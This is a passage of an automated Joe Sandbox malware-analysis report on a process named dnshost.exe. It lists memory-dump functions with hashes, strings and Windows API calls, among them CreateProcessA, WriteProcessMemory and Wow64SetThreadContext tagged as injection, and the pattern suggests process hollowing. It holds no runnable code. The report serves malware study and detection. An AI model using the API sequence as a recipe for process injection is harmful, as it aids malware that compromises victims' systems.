Source File: 0000000C.00000002.2111395469.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_115d000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2aae0f943071fc79f07f5327e59ed5a8078ff312c0044dcc34eb02272cfd84a
Instruction ID: cdf6341740f0b9be133c4d441158da27f010283c1761f4ef19d3ef827b38b66f
Opcode Fuzzy Hash: e2aae0f943071fc79f07f5327e59ed5a8078ff312c0044dcc34eb02272cfd84a
Instruction Fuzzy Hash: BC212271604200DFDF59DF58E9C0B26BB65EB88324F20C96DDC1A4B246C33AD807CB62

Function 0115D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2111395469.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_115d000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d6aebb4f817979b573cc2df1512a82557ae97db5fd414cc31543f73ff8d0180
Instruction ID: 62d3bb07810bdecd45899522b2b9e8d25a084eee66f86592798dd286d89cccf0
Opcode Fuzzy Hash: 5d6aebb4f817979b573cc2df1512a82557ae97db5fd414cc31543f73ff8d0180
Instruction Fuzzy Hash: CA219A75509380CFDB07CF24D994B15BF71EB46214F28C5EAD8498B2A7C33A980ACB62

Function 0114D49B Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2111323304.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_114d000_nD2ozRD7MN.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction ID: d454d11bffe3660294be27f8204d88d4fd2518ce62a9d3c9cd7fb553b516588a
Opcode Fuzzy Hash: 2a42a10f79047cfc5a8dfbea04f5877e4b045e58f4eb555799dbe40d0299e0d1
Instruction Fuzzy Hash: 6D11DF76504240CFDF06CF48E5C4B16BF71FB94324F24C1A9D9094B256C33AD45ACBA2

Analysis Process: dnshost.exePID: 7680, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	288
Total number of Limit Nodes:	17

Executed Functions

Function 073EE7E0 Relevance: 11.0, Strings: 8, Instructions: 962
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHeq, xrefs: 073EE981
Hiq, xrefs: 073EECB1
Hiq, xrefs: 073EF074
Hiq, xrefs: 073EEC52
Hiq, xrefs: 073EF292
Hiq, xrefs: 073EF0D3
(iq, xrefs: 073EE9AD
Hiq, xrefs: 073EEE70

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID: (iq$Hiq$Hiq$Hiq$Hiq$Hiq$Hiq$PHeq
API String ID: 0-201796279
Opcode ID: e6d47b62eb80e7ebbd0a3713642133435dab723fa167e86856b5464399a446a7
Instruction ID: 28840a392c91a1a87b6ecc40d8a8cfe5fb005fa978e43a48cb1d52c641b37ada
Opcode Fuzzy Hash: e6d47b62eb80e7ebbd0a3713642133435dab723fa167e86856b5464399a446a7
Instruction Fuzzy Hash: 5A62BFB07101158FEB58EB78C85866E7BAABFC8310F248569D10ADB3E5CE30DD46C7A1

Function 073E2106 Relevance: 1.8, Strings: 1, Instructions: 562COMMON

Download Yara Rule

Strings

D, xrefs: 073E210B

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 22e1f7608ddfdb2a80fcbe026cf4083cd2ba0bb30c428592c6224e64454cf6c1
Instruction ID: 87cdd4a9ce1f235de47a2f132566f3c0c17d4b2b13cf827b55aecb406c0316c0
Opcode Fuzzy Hash: 22e1f7608ddfdb2a80fcbe026cf4083cd2ba0bb30c428592c6224e64454cf6c1
Instruction Fuzzy Hash: 1E52B974A112298FCB65DF68C998A9DBBB6FF89300F1041D9D50AA7365CB30AEC1CF51

Function 073E6CE8 Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8995d3a42d6057c718e2027cbf50c2f30ed623333e840bf3c36237d7cb9a6a91
Instruction ID: 57346284fdc7c7e3a06ed678be8aba747519e479e0252a07a1a842af5470b437
Opcode Fuzzy Hash: 8995d3a42d6057c718e2027cbf50c2f30ed623333e840bf3c36237d7cb9a6a91
Instruction Fuzzy Hash: B8525CB0600615CFDB54DF68C588AADB7F6FF89314F5585A8E40A9B3A1DB31EC86CB40

Function 016ED530 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 016ED5BE
GetCurrentThread.KERNEL32 ref: 016ED5FB
GetCurrentProcess.KERNEL32 ref: 016ED638
GetCurrentThreadId.KERNEL32 ref: 016ED691

Strings

4'eq, xrefs: 016ED509

Memory Dump Source

Source File: 0000000F.00000002.2082416333.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_dnshost.jbxd

Similarity

API ID: Current$ProcessThread
String ID: 4'eq
API String ID: 2063062207-1552367303
Opcode ID: 849d992d94a0b2466fd2d8ab4e94e6a5f4e0af017cb583e6478d711039f3663e
Instruction ID: 3c6f0210ba8f1e703fe9789c6abfdfd53a0974da1904fa4abe019c97d3e3c72e
Opcode Fuzzy Hash: 849d992d94a0b2466fd2d8ab4e94e6a5f4e0af017cb583e6478d711039f3663e
Instruction Fuzzy Hash: 546185B09013498FDB14DFA9D948BAEBFF1FF88318F208559E109A72A1DB346944CF65

Function 016ED540 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 016ED5BE
GetCurrentThread.KERNEL32 ref: 016ED5FB
GetCurrentProcess.KERNEL32 ref: 016ED638
GetCurrentThreadId.KERNEL32 ref: 016ED691

Memory Dump Source

Source File: 0000000F.00000002.2082416333.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_dnshost.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b814dc16a1cb94506e41c7e8505018c60fb5c8e4c79ea09a70103bf779c14a1b
Instruction ID: 4e6bb9ee419986561a60233ba045c3bb1d06abb11478c1710b8b0b303e900902
Opcode Fuzzy Hash: b814dc16a1cb94506e41c7e8505018c60fb5c8e4c79ea09a70103bf779c14a1b
Instruction Fuzzy Hash: E05144B09013498FDB14DFA9D948BAEBBF1FF88318F208459E109A73A1D734A944CF65

Function 073ED570 Relevance: 2.8, Strings: 2, Instructions: 299
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

PHeq, xrefs: 073ED6EE
PHeq, xrefs: 073ED85C

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID: PHeq$PHeq
API String ID: 0-3382621680
Opcode ID: f0031a9ab2cff16afcd9c5c89dfa3d1fa3e1303a2d71b4a76560aca448a845ee
Instruction ID: a000453944ac93ec2f4189db8eb6aa502c35e9814714c4be3cd42e28864545c6
Opcode Fuzzy Hash: f0031a9ab2cff16afcd9c5c89dfa3d1fa3e1303a2d71b4a76560aca448a845ee
Instruction Fuzzy Hash: 70C114B4B10219CFDB18DF68C594A9DBBF5BF89310F1545A8E40AAB3A1DB31EC41CB50

Function 0737E984 Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0737EBC6

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d084095b77c17fd30997f6d9d520eeecf919e8bfc80075003d0718792bd8e15d
Instruction ID: 00ac3c45c6abb12c44aa34bc2218decf6e47acac51c261bd6380ff9cb20021cb
Opcode Fuzzy Hash: d084095b77c17fd30997f6d9d520eeecf919e8bfc80075003d0718792bd8e15d
Instruction Fuzzy Hash: 2EA14EB1D0021ACFEB24CF68C945BDDBBB2BF48314F1481A9D859A7250DB789985CF91

Function 0737E990 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0737EBC6

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b3f8feb30dac05c0c2911806d6556ba0f7f7812e0f77e4ea760042b1ec7fac8c
Instruction ID: 5a047a1f3c363c4a27d74cdfe42da990ddc6e82ffe3e3c8b93d06edce0ab6538
Opcode Fuzzy Hash: b3f8feb30dac05c0c2911806d6556ba0f7f7812e0f77e4ea760042b1ec7fac8c
Instruction Fuzzy Hash: 06914DB1D0031ACFEB20CF68C945BDDBBB2BF48314F1486A9D849A7250DB789985CF91

Function 073EB5CD Relevance: 1.7, Strings: 1, Instructions: 487COMMON

Download Yara Rule

Strings

(iq, xrefs: 073EBAE2

Memory Dump Source

Source File: 0000000F.00000002.2109783056.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_73e0000_dnshost.jbxd

Similarity

API ID:
String ID: (iq
API String ID: 0-3943945277
Opcode ID: 83ffbd61100d4cb42519cbe00ea7f371c60487961eee35cdbd3ceac8ba22cea5
Instruction ID: d21c8e92f37f18028fe3aad11f5fa38d37eecb565c54beea28deb60aa70b63d0
Opcode Fuzzy Hash: 83ffbd61100d4cb42519cbe00ea7f371c60487961eee35cdbd3ceac8ba22cea5
Instruction Fuzzy Hash: 2C1227B4B001158FDB55DB68D498EADBBF6FF89304F5581A8E4099B3A5CB30EC85CB90

Function 016EB298 Relevance: 1.7, APIs: 1, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2082416333.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 386df5008f2ac9bddfc1717246fe26212ea5830bbdb55dc48732be25d886fe04
Instruction ID: c3a55da509ff79389049a86039c21a39af283987a0c6786e903d510ea65ee827
Opcode Fuzzy Hash: 386df5008f2ac9bddfc1717246fe26212ea5830bbdb55dc48732be25d886fe04
Instruction Fuzzy Hash: 4F8144B0A01B058FD725DF2AD84979ABBF1FF88204F008A2DD44ADBB44D735E949CB91

Function 030B1DCC Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 030B1EEA

Memory Dump Source

Source File: 0000000F.00000002.2086189777.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30b0000_dnshost.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: fc7e9256ec8a6fd4594807d092a16329e4a5a203359a044fdaa99a65664b9a38
Instruction ID: 8b99375436434ced6188c1573f57c0abd353dbeb2fe711b6cc151ddd9547690d
Opcode Fuzzy Hash: fc7e9256ec8a6fd4594807d092a16329e4a5a203359a044fdaa99a65664b9a38
Instruction Fuzzy Hash: 1751CFB1D013099FDB18CF9AC894ADEBBF5FF48350F64812AE818AB211D7719941CF90

Function 030B1DD8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 030B1EEA

Memory Dump Source

Source File: 0000000F.00000002.2086189777.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30b0000_dnshost.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 4c091d252f782a2525138ea75e489b1721dcdf6abac7948fc9411cb4f05a4dcd
Instruction ID: c03dc3a611cf087a91b49f56af1ddb35c79b52130c7a08a6b9676932769542bd
Opcode Fuzzy Hash: 4c091d252f782a2525138ea75e489b1721dcdf6abac7948fc9411cb4f05a4dcd
Instruction Fuzzy Hash: 9041BEB1D003099FDB14CF9AC994ADEBBF6BF48310F24812AE818AB211D775A945CF90

Function 016E5AA4 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2082416333.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_dnshost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 535fda2cbfc9fc42f370d7787b19189ef5d41777573535621d9df28cf8aa2394
Instruction ID: 6f57dbc31f17f818bbbe797e5285f7d7c93c6449ff620e13d431ac3b00ee5856
Opcode Fuzzy Hash: 535fda2cbfc9fc42f370d7787b19189ef5d41777573535621d9df28cf8aa2394
Instruction Fuzzy Hash: 8241ACB9C06389CEDB15CFACCC886EDBFF1AF52318F14428AC8066B251D775690ACB11

Function 016E592D Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 016E59E9

Memory Dump Source

Source File: 0000000F.00000002.2082416333.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_dnshost.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 96c01d5b850516f0d86495eaa98f28b189ad5cec34923cbaf407fec73fc9059d
Instruction ID: 28243f1ef523dcb33fb3507cf1d76caf608811910e24330159e01dc4ad26727c
Opcode Fuzzy Hash: 96c01d5b850516f0d86495eaa98f28b189ad5cec34923cbaf407fec73fc9059d
Instruction Fuzzy Hash: CA41D3B5C00719CFDB24DFA9C888B8DBBF6BF49304F20815AD509AB251DB756945CF90

Function 030B163C Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 030B4461

Memory Dump Source

Source File: 0000000F.00000002.2086189777.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_30b0000_dnshost.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: a341bd8163e6e83d326f13906f7e7038f4e50c0a949d81f4ac75527ed119f507
Instruction ID: ff43aa6e49bb7cc526dfd237e5528526f02738311806a95f4ee0bb39aa4acb91
Opcode Fuzzy Hash: a341bd8163e6e83d326f13906f7e7038f4e50c0a949d81f4ac75527ed119f507
Instruction Fuzzy Hash: 1841F9B5900305DFDB14CF9AC888AAAFBF5FF88314F24C459D519AB721D774A941CBA0

Function 016E4508 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 016E59E9

Memory Dump Source

Source File: 0000000F.00000002.2082416333.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_dnshost.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 76b6fd5c51efa1104308e5c349b699a4992a76c4a8e19b2ebc4caf2b25206da9
Instruction ID: 5cdb89b11f926d22c133bb08d8f5776a0afe4e0c028a395febd4ea61f6ab28f6
Opcode Fuzzy Hash: 76b6fd5c51efa1104308e5c349b699a4992a76c4a8e19b2ebc4caf2b25206da9
Instruction Fuzzy Hash: 6941E2B4C00719CBDB24DFA9C888B9EBBF5BF49304F20816AD409AB251DB756949CF90

Function 0735A277 Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0735A357

Memory Dump Source

Source File: 0000000F.00000002.2109577441.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7350000_dnshost.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 42b930ccabcd4312079df4a94d4dad6cf7e9f7592b32431cbc3f88c9329c2a8d
Instruction ID: f126a7cb22292572d6db9e75b0affd9cd1672608a53c549ce5004756452004bb
Opcode Fuzzy Hash: 42b930ccabcd4312079df4a94d4dad6cf7e9f7592b32431cbc3f88c9329c2a8d
Instruction Fuzzy Hash: 783115B6900309AFDB11CF99D840ADEBFF4FF48320F14841AE918A7210D735A940DBA0

Function 0735BFF0 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2109577441.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7350000_dnshost.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 59792b3f2a5ff136a24fec0c29bf56efdee31f0dce1cdf49055be8d08493ef74
Instruction ID: 72faaf237cf2edf18b8f03b3519f9afff32633a87f320b681329728abecfa909
Opcode Fuzzy Hash: 59792b3f2a5ff136a24fec0c29bf56efdee31f0dce1cdf49055be8d08493ef74
Instruction Fuzzy Hash: 81319AB2905359AFDB12CFA9C804ADEBFF8EF09310F14805AE954A7261C3359950DFA1

Function 0737E700 Relevance: 1.6, APIs: 1, Instructions: 74injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0737E798

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: e901272ec79c6881dde4a4f248eb41ae3d618dab458fba076b168b00d3fabdae
Instruction ID: 733014e494be64bc7ca037a113ba3bef7961ffaf4e274c03a01c860c64af270a
Opcode Fuzzy Hash: e901272ec79c6881dde4a4f248eb41ae3d618dab458fba076b168b00d3fabdae
Instruction Fuzzy Hash: A4215AB59003599FDB20CFA9C985BDEBFF5FF48320F14842AE918A7240D7789944CBA0

Function 0735A2B9 Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0735A357

Memory Dump Source

Source File: 0000000F.00000002.2109577441.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7350000_dnshost.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 85348b5cd239de7d8b368e0c35fa4b9f20e8fbc1623401588e5c2fb35e1f3673
Instruction ID: dff6fb97c981812a1e5b92e626df30070d7eb8757fa1d33f147639c7c3721f51
Opcode Fuzzy Hash: 85348b5cd239de7d8b368e0c35fa4b9f20e8fbc1623401588e5c2fb35e1f3673
Instruction Fuzzy Hash: DD31C2B590024A9FDB10CF9AD884ADEFFF5FB48324F14842AE919A7210D775A944DFA0

Function 0737E708 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0737E798

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 1015ff5acd2969360733e894efa30638d030bb1e6415de0f5e703d80b6785dc7
Instruction ID: 73dbfa16ac274095f8570e295f6614ff5368ad82e050efd768fff9b62692c238
Opcode Fuzzy Hash: 1015ff5acd2969360733e894efa30638d030bb1e6415de0f5e703d80b6785dc7
Instruction Fuzzy Hash: FC2136B59003599FDB10CFA9C985BEEBBF5FF48320F10842AE918A7240D7789944DBA0

Function 0735A2C0 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?), ref: 0735A357

Memory Dump Source

Source File: 0000000F.00000002.2109577441.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7350000_dnshost.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 24f2df7516a5c7ed84d3795a47e7dc67211a33eb233b22de1619a3cf61ac237a
Instruction ID: 09b0105512c1a487fd88d19286cb949e409e39ba639471e817ad7da7a224bdd2
Opcode Fuzzy Hash: 24f2df7516a5c7ed84d3795a47e7dc67211a33eb233b22de1619a3cf61ac237a
Instruction Fuzzy Hash: 2021AEB590024A9FDB10CF9AD884A9EFBF5FB48324F14842AE919A7210D775A944DFA0

Function 016ED780 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016ED80F

Memory Dump Source

Source File: 0000000F.00000002.2082416333.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_dnshost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4c95b977ff10ceb09c55435caa7117d3c215b0674175df26d7e3318b205f3a40
Instruction ID: cdc28b7486edeed123cc8af566a22772d3ca87cf253789d13e7a7380cfffd30d
Opcode Fuzzy Hash: 4c95b977ff10ceb09c55435caa7117d3c215b0674175df26d7e3318b205f3a40
Instruction Fuzzy Hash: 1C21D2B5901249EFDB10CF9AD984ADEBBF9FB48320F14811AE918A3250D375A945CFA1

Function 0737E7F1 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0737E878

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0b8caa28d119731b555134d3864540d3e6c84d95195d86db936ef2a6540f8407
Instruction ID: 50b1ad225b7cc8d5bc9f0a0869e876257c60fd7ff5dea9bb5c55d10f2a917989
Opcode Fuzzy Hash: 0b8caa28d119731b555134d3864540d3e6c84d95195d86db936ef2a6540f8407
Instruction Fuzzy Hash: 332139B1D002599FDB10CFA9C880ADEFBF5FF48320F10842AE518A7240D7389541DBA0

Function 0737E56B Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0737E5EE

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 5a4423a239d7cc3526fbd48aa16b6d672c5a875e9ad62547929247d70c6a80b8
Instruction ID: 1ec752a2a54fd7be976cf9c423a908de2e18930652755e6cb4339c495b1e0a28
Opcode Fuzzy Hash: 5a4423a239d7cc3526fbd48aa16b6d672c5a875e9ad62547929247d70c6a80b8
Instruction Fuzzy Hash: AE2179B1D003198FDB20CFAAC8857EEBBF4EF48324F54842AD419A7241DB789945CFA1

Function 0737E7F8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0737E878

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f53bb1e14101f1e84d6c6e8a1ea62accee14190f446d390c4e98b265031e9c56
Instruction ID: 6f2b3052bd0195258c41e48b96f6301ffc91db7f045009cb679d21fc46021ce9
Opcode Fuzzy Hash: f53bb1e14101f1e84d6c6e8a1ea62accee14190f446d390c4e98b265031e9c56
Instruction Fuzzy Hash: 19213CB1D003599FDB10CF99C984ADEFBF5FF48310F10842AE518A7250D7389540DB61

Function 0737E570 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0737E5EE

Memory Dump Source

Source File: 0000000F.00000002.2109706656.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7370000_dnshost.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 8c912be5777eea0b4d2e641bb2fa278b27527cca4ff016fb703112dd39b95a73
Instruction ID: be18f440f086bded08de7d3b9edf941677fbaedfb38cff7804c9af9c6a018095
Opcode Fuzzy Hash: 8c912be5777eea0b4d2e641bb2fa278b27527cca4ff016fb703112dd39b95a73
Instruction Fuzzy Hash: 87215BB1D003198FDB20CFAAC5857EEBBF4EF48324F14842AD419A7241DB789945CFA5

Function 016ED788 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 016ED80F

Memory Dump Source

Source File: 0000000F.00000002.2082416333.00000000016E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_16e0000_dnshost.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: c64cfcd87331f70a16e55f24a03747da217d703a3c99b4c55c324efb6c92dd41
Instruction ID: 568a866063d69becacb55369d86b3e81dcdf38d5c5e0f4c0badedab326a579e1
Opcode Fuzzy Hash: c64cfcd87331f70a16e55f24a03747da217d703a3c99b4c55c324efb6c92dd41
Instruction Fuzzy Hash: 6621C4B5901249DFDB10CF9AD984ADEBFF9FB48320F14841AE918A3350D374A944DFA5

Function 0735AF40 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,0735C00A,?,?,?,?,?), ref: 0735C0AF

Memory Dump Source

Source File: 0000000F.00000002.2109577441.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7350000_dnshost.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: d256671da84cb8711500b1e2e873c30c3bcadeabffe3f5c0567f78a9ebdaa44a
Instruction ID: d6a557911454bb134b9e33fbed8f68217824def970de17c7236a89359d76ef47
Opcode Fuzzy Hash: d256671da84cb8711500b1e2e873c30c3bcadeabffe3f5c0567f78a9ebdaa44a
Instruction Fuzzy Hash: A61129B68003499FDB20CF9AC844BDEBFF8EB48314F14841AE914A7210C375A950DFA5

Function 0737E643 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

